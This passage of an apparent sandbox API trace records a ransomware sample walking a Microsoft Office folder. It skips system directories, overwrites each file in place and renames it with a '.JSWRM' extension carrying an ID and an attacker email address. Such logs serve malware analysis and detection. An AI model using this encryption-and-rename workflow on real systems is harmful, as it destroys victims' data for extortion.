1 [0115.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0115.435] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9c1bf71, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONENOTE_COL.HXT", cAlternateFileName="ONENOT~1.HXT")) returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2=".") returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="..") returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="...") returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="windows") returned -1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="recovery") returned -1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="perflogs") returned -1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="documents and settings") returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="system volume information") returned -1 [0115.435] lstrcmpiW (lpString1="ONENOTE_COL.HXT", lpString2="msocache") returned 1 [0115.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0115.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0115.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0115.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.436] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0115.436] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0115.436] ReadFile (in: hFile=0x238, lpBuffer=0x24bc18, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24bc18*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0115.437] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.437] WriteFile (in: hFile=0x238, lpBuffer=0x24bc18*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24bc18*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0115.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0115.437] CloseHandle (hObject=0x238) returned 1 [0115.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0115.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0115.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0115.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0115.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0115.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0115.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0115.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0115.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0115.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0115.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0115.439] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9bf5d95, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONENOTE_F_COL.HXK", cAlternateFileName="ONENOT~2.HXK")) returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2=".") returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="..") returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="...") returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="windows") returned -1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="recovery") returned -1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="perflogs") returned -1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="documents and settings") returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="system volume information") returned -1 [0115.511] lstrcmpiW (lpString1="ONENOTE_F_COL.HXK", lpString2="msocache") returned 1 [0115.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0115.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0115.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0115.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0115.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.513] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0115.513] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0115.514] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0115.514] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.514] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0115.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0115.515] CloseHandle (hObject=0x238) returned 1 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0115.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0115.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0115.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0115.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0115.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.515] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0115.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0115.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0115.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0115.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0115.516] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9bcfaf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9bcfaf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9bf5d95, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ONENOTE_K_COL.HXK", cAlternateFileName="ONENOT~1.HXK")) returned 1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2=".") returned 1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="..") returned 1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="...") returned 1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="windows") returned -1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="recovery") returned -1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="perflogs") returned -1 [0115.516] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="documents and settings") returned 1 [0115.517] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0115.517] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="system volume information") returned -1 [0115.517] lstrcmpiW (lpString1="ONENOTE_K_COL.HXK", lpString2="msocache") returned 1 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0115.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0115.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0115.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.518] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0115.518] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0115.518] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0115.519] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.519] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0115.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0115.519] CloseHandle (hObject=0x238) returned 1 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0115.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0115.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0115.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0115.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONENOTE_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onenote_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0115.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 